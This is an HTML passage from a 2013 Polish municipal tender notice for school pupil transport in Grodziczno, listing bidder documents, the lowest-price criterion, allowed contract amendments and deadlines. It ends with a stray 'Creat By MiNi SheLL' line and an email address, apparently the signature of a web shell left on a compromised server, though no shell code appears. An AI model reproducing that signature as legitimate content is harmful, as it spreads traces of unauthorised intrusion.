<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz Oferty, zgodnie z załączonym wzorem do SIWZ;
Dokument potwierdzający ustanowienie pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia,
Pełnomocnictwo do podpisania oferty  w przypadku, gdy ofertę podpisuje osoba, która nie jest wskazana we właściwym rejestrze lub ewidencji działalności gospodarczej do reprezentacji podmiotu o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą,
Inne dokumenty i oświadczenia, o których mowa w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty, na podstawie którego dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących: 1) wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności powodujących, że wykonanie zamówienia będzie niemożliwe do wykonania zgodnie z ustalonymi trasami i kilometrami, 2) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia, niezależnych od Wykonawcy, 3) zmian terminu realizacji zamówienia, 4) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia, proponowanych przez jedną ze stron - jeżeli zmiany te są korzystne dla Zamawiającego, 5) zmian ilościowych dzieci skutkujących zmianami w ilości dowożonych uczniów, 6) zmian uzależnionych od zmiany planów lekcji, ilości dzieci, zmiany organizacji roku szkolonego, odpracowywania dni wolnych, skrócenia godzin nauki etc. 7) inne zmiany, które spowodują ingerencję w określenie przedmiotu zamówienia. 
2.Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w zakresie zmiany stawki VAT według zasad określonych w formularzu ofertowym i w projekcie umowy. 
3.Zmiany treści umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci obustronnie podpisanego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grodziczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy; Grodziczno 17A; 13-324 Grodziczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 08:30, miejsce: w sekretariacie (pokój nr 12 - parter) Urzędu Gminy w Grodzicznie; Grodziczno 17a; 13-324 Grodziczno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com